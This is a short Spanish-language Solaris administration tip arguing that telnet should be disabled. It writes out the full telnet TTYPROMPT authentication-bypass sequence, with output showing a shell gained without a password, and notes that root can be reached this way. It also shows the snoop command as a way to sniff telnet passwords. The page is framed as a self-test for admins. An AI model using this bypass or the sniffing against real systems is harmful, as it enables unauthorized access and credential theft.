← Volver a Tips

Administracion / Solaris

porque debo cerrar el telnet en Solaris (bueno en todos los unix).


Existen muchas maneras de hackear un servidor que tiene el telnet o puerto 23 abierto, pero en el caso especial de solaris (excepto solaris 9), tienen la siguiente vulnerabilidad:

ejecuta las siguientes líneas desde otro servidor para saber si te puedes hackear (lo hago con la finalidad de que reparen este error, no para que lo exploten).

Suponiendo que la ip de ataque es 192.168.1.1:

% telnet
telnet> environ define ttyprompt abcdef
telnet> o 192.168.1.1
sunos 5.8
user1 c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n
last login: whenever
$ whoami
user1

Nota: la cuenta user1 es una cuenta que existe en el servidor, creo
que es de imaginarse lo que puede pasar si la variable console esta comentada (root también puede hacer telnet y el servidor puede ser hackeado con la cuenta de root).

otra forma de atrapar los password's que pasan por telnet es con el
comando snoop de solaris:

# snoop 192.168.1.1

creo que esto es motivo suficiente para cerrar el telnet de tus
servidores.


Otros tips de Solaris